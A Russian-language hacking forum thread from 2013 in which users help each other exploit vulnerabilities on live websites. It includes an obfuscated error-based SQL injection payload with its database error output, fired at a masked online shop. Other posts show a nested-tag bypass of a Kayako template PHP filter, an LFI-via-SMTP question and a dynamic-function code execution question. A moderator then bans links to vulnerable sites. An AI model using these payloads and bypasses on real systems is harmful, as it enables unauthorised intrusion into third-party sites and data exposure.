Старый 29.04.2013, 14:05   #2861
wget
 
Аватар для wget
 
Регистрация: 16.06.2012
Сообщений: 33
Репутация: 5
По умолчанию

Цитата:
Сообщение от Boolean Посмотреть сообщение
Наверное стоит всё таки дать URL.
Код:
***.**/catalog/izmeritelnoe_oborudovanie/aksessuaryi_k_izmeritelnomu_oborudovaniyu/?brand=42411
1c-битрикс

Последний раз редактировалось Jokester; 14.05.2013 в 15:20..
wget вне форума   Ответить с цитированием
Старый 29.04.2013, 14:20   #2862
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от wget Посмотреть сообщение
Код:
***.**/catalog/izmeritelnoe_oborudovanie/aksessuaryi_k_izmeritelnomu_oborudovaniyu/?brand=42411
1c-битрикс
Ну, что-то примерно такое вышло:
Код:
%27+and(select%23ect%0A+1+/*+a+from*/from+%23om%0A(select%23ect%0A+count(*)%2Cconcat((select%23ect%0A+user%23er%0A())%2Cfloor(rand(0)*2))x+/*+a+from*/from++information_schema.tables+group+by+x)a)+--+a
Код:
http://www.***.**/catalog/izmeritelnoe_oborudovanie/aksessuaryi_k_izmeritelnomu_oborudovaniyu/?brand=42411%27%20and%28select%23ect%0A+1+/*%20a%20from*/from%20%23om%0A%28select%23ect%0A+count%28*%29,concat%28%28select%23ect%0A+user%23er%0A%28%29%29,floor%28rand%280%29*2%29%29x+/*%20a%20from*/from%20+information_schema.tables+group+by+x%29a%29%20--%20a
Код:
MySQL Query Error: SELECT * FROM seo_text WHERE section = '645' AND brand = '42411' and(select#ect
 1 /* a from*/from #om
(select#ect
 count(*),concat((select#ect
 user#er
()),floor(rand(0)*2))x /* a from*/from  information_schema.tables group by x)a) -- a'

[Duplicate entry 'tools@localhost1' for key 1]<br><br>
__________________
|

Последний раз редактировалось Jokester; 14.05.2013 в 15:20..
Boolean вне форума   Ответить с цитированием
Старый 10.05.2013, 18:30   #2863
Dr.D0z1k
 
Аватар для Dr.D0z1k
 
Регистрация: 20.04.2013
Сообщений: 6
Репутация: 0
По умолчанию

Подскажите по сплоиту.
http://www.exploit-db.com/exploits/18736/
Цитата:
Test: we need to construct specific base64 encoded payload.
First, semicolon-separated string:

forums;/../../test;1;1;1;come2waraxe (at) yahoo (dot) com [email concealed]

Email address and other components must be valid for successful test.
Как понять где какой параметр?
Dr.D0z1k вне форума   Ответить с цитированием
Старый 12.05.2013, 19:19   #2864
newbie
 
Регистрация: 12.05.2013
Сообщений: 1
Репутация: 0
По умолчанию

Столкнулся с ком. кмс kayako fusion. Есть права на правку шаблонов, шаблоны построены на основе смарти, в конфе смарти $GLOBALS['smarty']->allow_php_tag = false; следовательно {php}{/php} не прокатывают. В самом конфе кайако
PHP код:
$_templateName . $this->_templateGroupID, preg_replace('/<(\s*)script(\s*)language(\s*)=(\s*)("|\'?)php("|\'?)(\s*)>/i', '', str_replace(array('<?php', '<?', '?>', '<%', '%>'), ''
Правильно ли я понимаю, что это идеальный вариант, чтобы никто не смог залится через шаблоны?
newbie вне форума   Ответить с цитированием
Старый 12.05.2013, 20:30   #2865
romashka_sky
 
Регистрация: 01.10.2011
Сообщений: 33
Репутация: 8
По умолчанию

Цитата:
Сообщение от newbie Посмотреть сообщение
Столкнулся с ком. кмс kayako fusion. Есть права на правку шаблонов, шаблоны построены на основе смарти, в конфе смарти $GLOBALS['smarty']->allow_php_tag = false; следовательно {php}{/php} не прокатывают. В самом конфе кайако
PHP код:
$_templateName . $this->_templateGroupID, preg_replace('/<(\s*)script(\s*)language(\s*)=(\s*)("|\'?)php("|\'?)(\s*)>/i', '', str_replace(array('<?php', '<?', '?>', '<%', '%>'), ''
Правильно ли я понимаю, что это идеальный вариант, чтобы никто не смог залится через шаблоны?
PHP код:
$str = '<<??php phpinfo(); ??>>';
var_dump(str_replace(array('<?php', '<?' ,'?>', '<%', '%>'), '', $str)); // string '<?php phpinfo(); ?>' (length=19)
romashka_sky вне форума   Ответить с цитированием
Старый 14.05.2013, 12:17   #2866
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию Изменение правил темы

Господа, прошу обратить внимание на смену формата темы. С сегодняшнего дня в теме запрещены линки на ресурсы с уязвимостями и соответственно вопросы из серии "помогите раскрутить баг".

В первый пост внесены изменения, идеальные вопросы в данной теме - это разбор уязвимостей в коде, но вопросы без линков тоже будут оставлены. Все вопросы с уязвимостями на конкретных сайтах из темы будут постепенно удалены, тема почищена.

Спасибо за внимание.
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 16.05.2013, 22:59   #2867
Воришко
 
Регистрация: 17.03.2013
Сообщений: 17
Репутация: -7
По умолчанию

Цитата:
Сообщение от Jokester Посмотреть сообщение
Господа, прошу обратить внимание на смену формата темы. С сегодняшнего дня в теме запрещены линки на ресурсы с уязвимостями и соответственно вопросы из серии "помогите раскрутить баг".

В первый пост внесены изменения, идеальные вопросы в данной теме - это разбор уязвимостей в коде, но вопросы без линков тоже будут оставлены. Все вопросы с уязвимостями на конкретных сайтах из темы будут постепенно удалены, тема почищена.

Спасибо за внимание.
Печаль... В данной теме многие ребята помогали друг другу в раскрутке необычных уязвимостей, обходы фильтров всех мастей, какие то уловки и трюки... и все это обычные ребята, а не гламурная элита(по другому вас просто не назвать), вы уже и не знаете как к себе внимание привлечь, кроме как поучениями, минусами рандомным отписавшимся в этой теме, и пальцами веером.
Я надеюсь ребята которые в данной теме всем помогали переберутся постепенно на античат, и взаимопомощь продолжится там.
И уж не знаю, что вас смотивировало на такую реформу в данной теме, желание в очередной раз заявить о себе, или это запрет против помощи во взломе сайтов, но тогда следует помнить, что обсуждение уязвимостей в коде так же преследует определенные цели, отнюдь не благонамеренные(хотя уже это можно и оспорить), и каким бы профессиональным IT экспертом не был бы человек, если он сам по себе гавно, отношение окружающих к нему будет соответственное.
Воришко вне форума   Ответить с цитированием
Старый 16.05.2013, 23:32   #2868
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Цитата:
Сообщение от Воришко Посмотреть сообщение
Я надеюсь ребята которые в данной теме всем помогали переберутся постепенно на античат, и взаимопомощь продолжится там.
Я тоже очень надеюсь, что "ребята" так и поступят.

Если есть желание поговорить о "гламурной элите" и "простых хороших ребятах", на форуме существуют ветки оффтоп и обратная связь, в данной теме этого делать не нужно.
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 22.05.2013, 13:08   #2869
ErrNick
 
Аватар для ErrNick
 
Регистрация: 19.01.2011
Сообщений: 12
Репутация: 0
По умолчанию lfi + mail

у меня вопрос может быть и тупой но все же
есть LFI возможности кроме как заюзать пейлоад через smtp нет.
проблема в том что при коннекте телнетом к 25 порту ничего не видно что пишется, да и что там нужно писать сначала?
пробовал set local_echo нифига не происходит
что еще интересно
при вызове telnet ip port конект идет
а при таком расладе
cmd ->
telnet ->
open ip port
не коннектит (

ЗЫ в видео HACK QUEST 2010 есть подобный случай что он там вводит сначала не видно. заранее спасибо
ErrNick вне форума   Ответить с цитированием
Старый 22.05.2013, 21:12   #2870
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

возможно ли исполнение кода в данном случае:

$type = "xxx/yyy"; # этот параметр задается на стороне клиента
$methodName = str_replace('/', 'createfrom', $type);
$relust = $methodName("someParam");
DrakonHaSh вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot